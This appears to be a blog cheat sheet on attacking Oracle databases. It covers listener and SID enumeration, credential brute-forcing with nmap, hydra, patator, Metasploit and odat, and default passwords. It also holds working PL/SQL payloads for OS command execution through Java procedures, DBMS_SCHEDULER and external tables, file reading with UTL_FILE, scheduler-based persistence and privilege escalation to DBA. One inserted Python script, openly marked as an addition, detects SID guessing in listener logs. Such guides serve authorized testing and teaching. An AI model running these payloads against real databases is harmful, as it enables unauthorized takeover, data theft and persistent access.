
ORACLE Pentesting Best Practices

ORACLE

Oracle listens by default on TCP ports 1521, 1522 and 1529.

What is ORACLE?

Oracle Database (Oracle DB) is a relational database management system (RDBMS) from Oracle Corporation.

When enumerating Oracle, the first step is to talk to the TNS Listener, which usually resides on the default port (1521/TCP; you may also find secondary listeners on 1522-1529).

PORT     STATE SERVICE       VERSION
1521/tcp open  oracle-tns    Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open  oracle-tns    Oracle TNS Listener

ORACLE Pentesting

Shodan search query:
port:1521,1522,1529

Oracle Pentesting requirements installation

Installation of tools (sqlplus) and the libraries needed to use the Oracle MSF modules.

(This installation guide was created for version 12.1.0.1.0; change that name to the version that you download.)

As root, create the directory /opt/oracle. Then download the Oracle Instant Client packages for your version of Kali Linux. The packages you will need are:

  • instantclient-basic-linux-12.1.0.1.0.zip
  • instantclient-sqlplus-linux-12.1.0.1.0.zip
  • instantclient-sdk-linux-12.1.0.1.0.zip

Unzip these under /opt/oracle, and you should now have a path called /opt/oracle/instantclient_12_1/. Next, inside that directory, symlink the shared library so that tools can find it under its unversioned name:

cd /opt/oracle/instantclient_12_1
ln -s libclntsh.so.12.1 libclntsh.so
ls -lh libclntsh.so
lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
ldconfig

You also need to configure the appropriate environment variables; add the following to either ~/.bashrc or /etc/profile:

export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

Add the Oracle libraries to ldconfig (the file needs the .conf suffix to be picked up by /etc/ld.so.conf) and refresh the cache:

echo "/opt/oracle/instantclient_12_1/" >> /etc/ld.so.conf.d/99_oracle.conf
ldconfig

If you have succeeded, you should be able to run sqlplus from a command prompt (you may need to log out and log back in again):

sqlplus <username>/<password>@<ip_address>/<SID>

Step Two — Install Ruby Gem ruby-oci8

These steps are needed to use the Metasploit Oracle modules.

Install other OS dependencies:

apt-get install libgmp-dev

Compile and install ruby-oci8 (as root):

wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
unzip ruby-oci8-2.1.8.zip
cd ruby-oci8-ruby-oci8-2.1.8/
make
make install
gem install ruby-oci8

Restart msfconsole (or restart the machine).

Enumeration

Tools that can be used for this are: nmap, MSF and tnscmd10g.

TNS listener version

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>

Other useful TNS listener commands:

Command      Purpose
ping         Ping the listener
version      Provide output of the listener version and platform information
status       Return the current status and variables used by the listener
services     Dump service data
debug        Dump debugging information to the listener log
reload       Reload the listener configuration file
save_config  Write the listener configuration file to a backup location
stop         Invoke listener shutdown

If you receive an error, it could be because the TNS versions are incompatible (use the --10G parameter with tnscmd10g); if the error persists, the listener may be password protected (a list detailing all the errors is here). Don't worry, hydra to the rescue:

hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

The TNS listener could be vulnerable to MitM attacks. See here for how to check whether the server is vulnerable and how to perform the attack (all versions up to 12c are).

SID Enumeration

What is a SID?

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

In some old versions (it works in 9) you could simply ask for the SIDs and the database would send them to you:

tnscmd10g status -p 1521 -h <IP> # The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run # The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

If you cannot get the SIDs this way, you will need to brute-force them:

SID Bruteforce

I have merged the nmap and MSF SID lists into this one (without duplicates):

sids-oracle.txt

hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute # This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 # This will use the list located at /usr/share/nmap/nselib/data/oracle-sids

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade
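
From the defender's side, every SID rejected during the guessing above is written to the listener's own log with return code 12505 (unknown SID) or 12514 (unknown service name), the very codes patator is told to ignore. The following script is an added example (my code, not from the post or any of the tools it lists) that parses constructed listener.log lines in the usual "timestamp * connect data * address * establish * sid * return code" layout and flags a client that asks for several different unknown SIDs within a short window; the field layout, the sample hosts and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of listener.log lines (not a real capture): a status command,
# a legitimate connection from 10.10.1.20, and a burst of SID guesses from 10.10.1.5
# that ends with the listener accepting ORCL. Each rejected request is followed by
# the TNS-12505 line the listener writes.
SAMPLE_LOG = """\
02-MAR-2016 14:57:30 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=kali)(USER=root))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=153092352)) * status * 0
02-MAR-2016 14:57:58 * (CONNECT_DATA=(SERVICE_NAME=ORCL)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.20)(PORT=51122)) * establish * ORCL * 0
02-MAR-2016 14:58:00 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43120)) * establish * XE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
02-MAR-2016 14:58:00 * (CONNECT_DATA=(SID=ORA10)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43121)) * establish * ORA10 * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
02-MAR-2016 14:58:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43122)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
02-MAR-2016 14:58:01 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43123)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
02-MAR-2016 14:58:02 * (CONNECT_DATA=(SID=DB11g)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43124)) * establish * DB11g * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
02-MAR-2016 14:58:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.1.5)(PORT=43125)) * establish * ORCL * 0
"""

TS_FMT = "%d-%b-%Y %H:%M:%S"
HOST_RE = re.compile(r"\(HOST=([^)]*)\)")
SID_RE = re.compile(r"\((?:SID|SERVICE_NAME)=([^)]*)\)")
# Return codes the listener logs when it does not know the requested SID (12505)
# or service name (12514); patator ignores exactly these while guessing.
UNKNOWN_SID_CODES = {"12505", "12514"}


def parse_establish(line):
    """Return (timestamp, client_host, requested_sid, return_code) for an
    'establish' entry; None for command entries, TNS- error lines and anything
    else that does not have the six ' * '-separated fields."""
    fields = [f.strip() for f in line.split(" * ")]
    if len(fields) != 6 or fields[3] != "establish":
        return None
    ts = datetime.strptime(fields[0], TS_FMT)
    host = HOST_RE.search(fields[2])  # ADDRESS field carries the client IP
    sid = SID_RE.search(fields[1])    # CONNECT_DATA field carries the SID
    return (ts, host.group(1) if host else "?", sid.group(1) if sid else "?", fields[5])


def find_sid_guessing(log_text, window_seconds=60, min_distinct_sids=4):
    """Flag client hosts whose rejected requests named at least
    `min_distinct_sids` different SIDs/services within `window_seconds`.
    Returns {host: sorted list of every SID that host was refused}."""
    rejected = defaultdict(list)  # host -> [(timestamp, sid), ...]
    for line in log_text.splitlines():
        entry = parse_establish(line)
        if entry and entry[3] in UNKNOWN_SID_CODES:
            rejected[entry[1]].append((entry[0], entry[2]))
    flagged = {}
    for host, events in rejected.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({sid for _, sid in events[start:end + 1]}) >= min_distinct_sids:
                flagged[host] = sorted({sid for _, sid in events})
                break
    return flagged


if __name__ == "__main__":
    for host, sids in find_sid_guessing(SAMPLE_LOG).items():
        print(f"possible SID brute force from {host}: {len(sids)} unknown SIDs tried {sids}")
```

Point it at a real listener.log (by default under the ADR diagnostic directory of the listener) and tune the window and threshold to the number of legitimate services your clients actually request.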

Targeting Accounts

Got a SID? Excellent, now let's move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.

Metasploit's scanner/oracle/oracle_login has a built-in dictionary of the most popular default user account values, presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.

Nmap can also help here with the script oracle-brute. Note that this script mixes the logins and passwords, that is, it tries each login against every password, and it takes quite a while!

Default Passwords

Below are some of the default passwords associated with Oracle:

DBSNMP/DBSNMP - Intelligent Agent uses this to talk to the db server (it's some work to change it)
SYS/CHANGE_ON_INSTALL - Default sysdba account before and including Oracle v9; as of version 10g this has to be different!
PCMS_SYS/PCMS_SYS - Default x account
WMSYS/WMSYS - Default x account
OUTLN/OUTLN - Default x account
SCOTT/TIGER - Default x account

Other default passwords can be found here and here.

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to offline brute force.

Remote Stealth Pass Brute Force

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:

  1. The client connects to the server and sends the user name.
  2. The server generates a session identifier AUTH_SESSKEY and encrypts it by using AES-192. As its key, the system uses SHA-1 hash generated from user password and salt AUTH_VFR_DATA.
  3. The server sends an encrypted session ID and salt to the client.
  4. The client generates the key by hashing its password and received salt. The client uses this key to decrypt the session data received from the server.
  5. Based on decrypted server session ID, the client generates a new public key for future use.

Now, here's the most interesting part: the session ID AUTH_SESSKEY sent by the server to the client has a length of 48 bytes. Of these, 40 bytes are random and the last 8 are all 0x08 (padding). The initialization vector is 0x00 (null). Knowing that the last 8 bytes of the identifier always consist of 0x08, we can brute-force this password and, moreover, do it in offline mode, which means tremendous speed, especially if you use a GPU. To mount an attack, you need to know the SID, a valid login (for example, the SYS account is very interesting) and, of course, have the ability to connect to the database. In this case, no records such as Invalid Login Attempt are created in the Oracle audit logs!

Summing it all up:

  1. Use Wireshark to intercept the initial traffic during authorization; the tns display filter helps here.
  2. Extract the HEX values of AUTH_SESSKEY and AUTH_VFR_DATA.
  3. Insert them into the PoC script, which will perform a dictionary (brute-force) attack.

Using nmap and john

root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.10.x.x

Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.10.x.x
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE863330880E09FAD3B4832CBCFDAC1A821D2EA8E3D2209DB6*4202444F49DE9AE72AE2 - Hashed valid or invalid credentials
|   Statistics
|_    Performed 211 guesses in 9 seconds, average tps: 20

john hashes.txt

User/Pass bruteforce

Different tools offer different user/pass lists for Oracle:

oscanner: /usr/share/oscanner/accounts.default (169 lines)
msf > use admin/oracle/oracle_login # /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv (598 lines)
msf > use scanner/oracle/oracle_login # /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt (568 lines)
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 10.10.x.x
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL 10.10.x.x
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 10.10.x.x
nmap -sT -p 1521 -d -Pn --script-trace --script oracle-brute --script-args "oracle-brute.sid=orcl, brute.credfile=/usr/share/nmap/nselib/data/oracle-default-accounts.lst" 10.10.x.x # /usr/share/nmap/nselib/data/oracle-default-accounts.lst (687 lines)

I have mixed all of them and removed duplicates:

users-oracle.txt

pass-oracle.txt

Brute Force

Once you know a valid SID, brute-force user/password pairs with one of the following tools (sqlplus, installed above, is what you will use to connect afterwards):

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
msf> run

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
msf> run

#nmap fails sometimes for some reason executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

Offline Oracle SQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3): see the Remote Stealth Pass Brute Force section above.

Login with sqlplus

Now that you know a valid SID and valid credentials, connect to the database with sqlplus:

sqlplus <username>/<password>@<ip_address>/<SID>

If the TNS Listener is on a non-default port (e.g. TCP/1522):

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database privileges (sysdba) or system operator (sysoper) privileges, you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
#Example:
sqlplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'

All in One

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>

Another tool that will do all of this is odat:

git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help # There should be no problems on Kali
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> # To bruteforce accounts for that SID

With these options (-s and -p), ODAT will search for valid SIDs (System ID) as a first step. You can configure some options for the methods used (i.e. word-list or brute-force attack). By default, ODAT will use a big word list and do a small brute-force attack.

If ODAT finds at least one SID (e.g. ORCL), it will search for valid Oracle accounts. It will do that on each SID found. You can specify some options for credentials (e.g. --accounts-file, --accounts-files, --login-as-pwd).

For each valid account (e.g. SYS) on each valid instance (SID), ODAT will return what each Oracle user can do (e.g. reverse shell, read files, become DBA).

Wiki odat

Remote Code Execution

There are at least two different ways to execute commands, such as by using Java procedures and DBMS_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: ODAT.

Install ODAT

git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py # There should be no problems on Kali

Execute Code via Java Stored Procedure

./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

RCE: Java Store Procedure

So, imagine that you have the administrator account information. In this case, a very popular way to execute your command on the server is to write a ‘java stored’ procedure. This is done in three stages. First, create a Java class called ‘oraexec’. To do this, connect via ‘sqlplus’ terminal and write:

create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
  public class oraexec
  {
    public static void execCommand(String command) throws IOException
    {
      Runtime.getRuntime().exec(command);
    }
  }
/

Next, write a PL/SQL wrapper for this class:

create or replace procedure javacmd(p_command varchar2) as language java name 'oraexec.execCommand(java.lang.String)';
/

That's it. Now, to execute a command, all you need is just to send the following query:

exec javacmd('command');

Note that, when using the above procedure, we cannot see the results of the executed command; however, you can redirect the output to a file and read it. You can find the full code of the shell that allows reading and writing files here:

raptor_oraexec.sql

However, there is a more sophisticated script here that handles the command output, but it is larger.

RCE: Scheduler

The next method, which will help us if there is no Java virtual machine, is to use DBMS_SCHEDULER, the built-in task scheduler of Oracle. To use it, you must have the privilege CREATE EXTERNAL JOB. Here's a code sample that writes the string '0wned' into a text file in the root of the C: drive:

exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2008JOB',program_name => 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);

This will create and run a job for executing your command. And here’s an option for calling the Scheduler from another procedure – SYS.KUPP$PROC.CREATE_MASTER_PROCESS, which is of interest to us, primarily, because it allows you to embed multi-statement queries, that is, those consisting of multiple sub-queries. Theoretically, you can run such query even in case of injection into a web application.

select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''xxx'',''EXECUTABLE'',''cmd.exe /c echo qqq>>C:/scchh'',0,TRUE); DBMS_SCHEDULER.create_job(job_name=>''jobx'',program_name=>''xxx'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''xxx'');dbms_scheduler.purge_log;') from dual;

Note that, when you use the Scheduler, you can run this job more than once and with some frequency. As a result, this helps you get a foothold in the tested system because, even if the administrator deletes the user from the OS, this job, which runs regularly in the system, will bring the user back to life.

RCE: External Tables

As the last method for achieving the execution of OS commands, I would like to mention the use of External Tables. This method will help you later download files from the server. You will need the following privileges:

  • UTL_FILE;
  • CREATE TABLE;
  • a directory reserved for the user.

Let’s remember that the access to UTL_FILE package is by default provided to all accounts with CONNECT role.

Step one: Check the issued directories with the following query:

SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
and privilege='EXECUTE' ORDER BY GRANTEE;

TABLE_NAME
------------------------------
ALICE_DIR

Step two: Create an executable batch file with desired command:

declare
 f utl_file.file_type;
 s varchar2(200) := 'echo KOKOKO >> C:/pwned';
begin
 f := utl_file.fopen('ALICE_DIR','test.bat','W');
 utl_file.put_line(f,s);
 utl_file.fclose(f);
end;
/

Step three: Prepare the external table EXTT, you will need it to run the file:

CREATE TABLE EXTT (line varchar2(256))
ORGANIZATION EXTERNAL
(TYPE oracle_loader
  DEFAULT DIRECTORY ALICE_DIR
  ACCESS PARAMETERS
  ( RECORDS DELIMITED BY NEWLINE
    FIELDS TERMINATED BY ',')
  LOCATION (alice_dir:'test.bat'))
/

Now, just call your batch file with the following command:

SELECT * from EXTT;

The terminal will start to display error messages that the system cannot match the table and invoked file but, in this case, it is not important, as the main objective was to open the executable file, which you have achieved.

The ODAT.py utility can also implement this attack. However, it requires the privilege CREATE ANY DIRECTORY, which, by default, is granted only to the DBA role, since it attempts to execute the file from any directory and not only "your" directory.

Read/Write files

Now, let’s proceed to the task of reading and writing the files. If you simply need to read or write a file to the server, you can do it without any Java procedures, which, however, can also handle such tasks. Let’s have a look into UTL_FILE package that has the functionality required for working with the file system. The good news is that, by default, it can be accessed by all users with PUBLIC role. The bad news is that, by default, this procedure has no access to the entire file system, but only to a directory pre-defined by the administrator. However, it is not uncommon to find a directory parameter specified as *, which literally means “access to everything.” You can find this out by using the following command:

select name, value from v$parameter where name = 'utl_file_dir';

With appropriate rights, you can expand the access by using the following query:

alter system set utl_file_dir='*' scope=spfile;

I found that the shortest procedure for using UTL_FILE package is proposed by Alexander Polyakov:

SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN('C:/','boot.ini','r');
loop
UTL_FILE.GET_LINE(f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;
/

If you need more functionality, with the ability to write, I recommend searching for the script called raptor_oraexec.sql. And, according to tradition, here's the option using the ODAT utility, which, as always, is the shortest:

./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt

UTL_FILE package is also very interesting because if you’re lucky, you can reach the logs, configuration files and obtain passwords from privileged accounts, such as SYS.

The second method that I would like to mention is to use the External Tables again. Remember that, when using External Tables, the database can read data from external files. For a hacker, this means yet another opportunity to download files from the server, but this method requires the CREATE ANY DIRECTORY privilege. I suggest using ODAT straight away, as it is stable and fast:

./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"

Elevating Privileges

You can use various methods to elevate privileges, ranging from classic buffer overflows and DLL patching to specialized attacks against databases, such as PL/SQL injections. The topic is very extensive and, in this article, I will not dwell on it, as it is discussed in large research papers, such as those found in the blogs of Litchfield and Finnigan. I will just demonstrate some of them, so that you have a general idea. During testing, I recommend simply paying attention to the current privileges and, based on them, searching the Internet for the desired loopholes.

Unlike MS SQL, where an attacker can inject xp_cmdshell almost immediately after a SELECT by simply closing it with a quotation mark, Oracle DB flatly rejects such tricks. For this reason, we cannot always resort to classical SQL injection although, here too, it is possible to find a way out. We will consider PL/SQL injections, which modify the process of executing a procedure (function, trigger or other object) by embedding arbitrary commands into the available input parameters. (c) Sh2kerr

In order to embed the payload, find a function where the input parameters are not filtered. Remember that Oracle SQL does not allow multi-statement (multiple) queries; therefore, most likely, you will need to use some "special" procedures that have this feature. The main idea behind the attack is as follows: by default, unless specified otherwise, a procedure is executed on behalf of its owner and not on behalf of the user who started it. In other words, if a procedure owned by the SYS account is available for execution and you can embed your code into it, your payload will also be executed in the context of the SYS account. As I already mentioned, this is not always what happens, as there are procedures with the 'authid current_user' parameter, which means that the procedure will be executed with the privileges of the current user.

However, usually in each version, you can find some functions that are vulnerable to PL/SQL injection. A general view of this process is shown in the figure below:

[Figure: general view of the PL/SQL injection process]

In short, instead of the expected legitimate argument, we pass some malicious code that becomes part of the procedure. A good example is provided by the CTXSYS.DRILOAD function. It is executed on behalf of CTXSYS and does not filter the input parameter, which allows you to easily rise to DBA:

exec ctxsys.driload.validate_stmt('grant dba to scott');

However, by now this is probably history, since the vulnerability was found in 2004 and it affects only the old versions 8–9. Usually, the process of escalating privileges is divided into two parts: writing the procedure that increases the rights and performing the injection itself. A typical procedure is as follows:

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;RETURN(1);END;
/

Now we can inject the procedure as an argument of a vulnerable function (example for versions 10.x):

exec sys.kupw$WORKER.main('x','YY'' and 1=test1.f1 --');

In the not too recent versions 10 and 11, there is one nice exception, or rather a vulnerability, that allows you to execute commands on the server without having DBA rights: the DBMS_JVM_EXP_PERMS procedure allows a user with the CREATE SESSION privilege to get Java IO rights. The attack can be mounted as follows:

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;
  /

PL/SQL procedure successfully completed.

Now that you have the privileges to call Java procedures, you can evoke a response from the Windows interpreter and execute something:

SQL> select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c echo 123 >c:\\hack') from dual;

This post is licensed under CC BY 4.0 by the author.


Powered by 0xhav0c © 2022